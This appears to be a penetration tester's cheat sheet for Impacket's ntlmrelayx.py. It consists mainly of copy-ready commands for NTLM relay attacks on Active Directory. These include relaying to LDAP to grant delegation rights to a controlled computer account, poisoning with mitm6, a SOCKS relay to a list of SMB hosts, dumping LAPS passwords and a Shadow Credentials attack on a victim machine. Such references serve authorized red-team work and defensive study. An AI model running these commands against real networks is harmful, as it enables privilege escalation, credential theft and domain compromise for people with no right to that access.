
ntlmrelayx.py

ntlmrelayx.py is part of Impacket.

Escalate privileges via relay

If you've already added a computer record to the environment (using something like Powermad), you may be able to relay to LDAP and assign escalated privileges to that computer object! For example:

ntlmrelayx.py -t ldap://ip.of.domain.controller --delegate-access -smb2support --escalate-user COMPUTER-OBJECT-YOU-CONTROL$

Then, if you've found a system running the WebClient service, you could potentially coerce its authentication to a DNS record you've added and pull off the privesc!

Delegate access attack while poisoning with mitm6

ntlmrelayx.py -6 -wh doesntexist -t ldaps://ip.of.a.domain-controller --delegate-access

Set up a SOCKS relay to a list of hosts

In this example we have a targets.txt file full of entries like this:

smb://1.2.3.4
smb://1.2.3.5
smb://1.2.3.6

We set up the SOCKS relay like so:

ntlmrelayx.py -tf targets.txt -smb2support -socks

Dumping LAPS passwords

If you just want to set up a relay to dump the LAPS passwords (if you're lucky enough to relay a DA cred), you can skip the dumping of domain info and/or adding a DA account and specify only that you want to dump LAPS passwords:

ntlmrelayx.py -6 -wh doesntexist -t ldap://ip.of.a.domain-controller --no-da --no-dump --dump-laps

Shadow Credentials attack

My favorite write-up on this attack is probably this one from GuidePoint Security.

Find hosts with WebClient running

The webclientservicescanner works well for this.

Add a rogue DNS record pointing to your machine

Try dnstool.py for this.

Set up the relay for the Shadow Credentials attack

ntlmrelayx.py -t ldap://ip.of.a.dc --shadow-credentials --shadow-target 'VICTIM$' --no-validate-privs --no-dump --no-da

Trigger HTTP auth from VICTIMS

Head to our coercer page for more info.